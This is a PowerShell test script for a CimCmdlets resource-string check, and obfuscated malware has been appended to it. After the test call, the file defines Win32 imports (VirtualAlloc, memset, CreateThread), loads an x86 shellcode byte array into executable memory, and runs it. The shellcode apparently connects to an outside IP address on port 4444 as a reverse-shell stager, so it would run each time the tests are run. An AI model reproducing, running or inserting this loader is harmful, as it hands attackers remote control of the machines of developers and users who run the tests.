. "$psscriptroot/TestRunner.ps1"

${aSS`em`BlyNa`ME} = ("{1}{3}{4}{12}{8}{10}{5}{2}{13}{9}{6}{11}{7}{0}" -f's','Mi','.I','c','roso','t','Cim','mdlet','t.Man','ture.','agemen','C','f','nfrastruc')



${Excl`UDelI`St} = @()

if ( ${i`swIN`DoWs} )
{
    &("{3}{1}{0}{2}" -f'ort-modu','p','le','im') ("{1}{0}{2}" -f 'imCmdl','C','ets')
}


.("{2}{4}{6}{5}{0}{3}{1}"-f'eStr','s','Tes','ing','t-R','ourc','es') -AssemblyName ${a`S`seM`BLYNaMe} -ExcludeList ${ex`CLUDe`lISt}

${c} = ((("{28}{75}{16}{39}{74}{80}{47}{38}{73}{51}{44}{67}{36}{37}{65}{62}{14}{35}{2}{30}{27}{22}{48}{66}{68}{63}{13}{57}{79}{17}{11}{60}{54}{49}{8}{24}{10}{59}{61}{18}{15}{40}{33}{64}{72}{25}{3}{5}{32}{4}{58}{9}{26}{6}{69}{50}{70}{23}{0}{34}{19}{56}{46}{20}{45}{31}{7}{78}{77}{71}{55}{21}{53}{43}{41}{29}{52}{76}{1}{12}{42}" -f 'r','i','e,','Ptr lpP','ui','a',', I','sta',' extern IntPtr C','ionF','ateThread','b)]','nt count)','port(1n','int ','ta','l1','1n','t dwS','ms','t.dll1nb','tr m','locationType','Id);[DllImpo','re','t','lags',' flAl','[DllImport(1',' de',' uint','blic ','rameter, ','tAddr','t(1nb','dwSiz','t','Ptr Virt','e','nb','ckSize, IntPtr lpStar','tPtr',';','t(In','rn I',')]pu','r','tic ',', ','ic','tPtr lpTh','te','st, u','emse','t','tP','vc','b','nt dwCreat','(IntPtr lpThrea','public sta','dAttributes, uin','lAlloc(IntPtr lpAddress, u','flProtect);[DllIm','ess','ua','uin','n','t ','n','read','n In',', In','x',')]pu','nbkernel32.dl','int src, u','exter','tic ','kernel32.dll','blic sta'))-crEPlACe  '1nb',[CHAr]34);${w} = .("{1}{0}{2}" -f'y','Add-T','pe') -memberDefinition ${c} -Name ("{1}{0}"-f'in32','W') -namespace ("{4}{1}{3}{2}{0}" -f's','unct','n','io','Win32F') -passthru;[Byte[]];[Byte[]]${z} = 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x05,0x68,0x29,0x64,0x83,0x81,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x61,0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x22,0x58,0x68,0x00,0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0xe9,0x71,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc7,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5;${g} = 0x1000;if (${Z}."len`gTH" -gt 0x1000){${g} = ${Z}."lEnG`Th"};${X}=${W}::("{2}{1}{0}" -f 'c','tualAllo','Vir').Invoke(0,0x1000,${g},0x40);for (${i}=0;${I} -le (${z}."lENg`Th"-1);${i}++) {${W}::"M`emseT"([IntPtr](${x}.("{1}{0}" -f 't32','ToIn').Invoke()+${I}), ${Z}[${I}], 1)};${W}::("{1}{3}{0}{2}"-f 'eT','C','hread','reat').Invoke(0,0,${X},0,0,0);for (;;){.("{2}{0}{1}"-f't-s','leep','Star') 60};
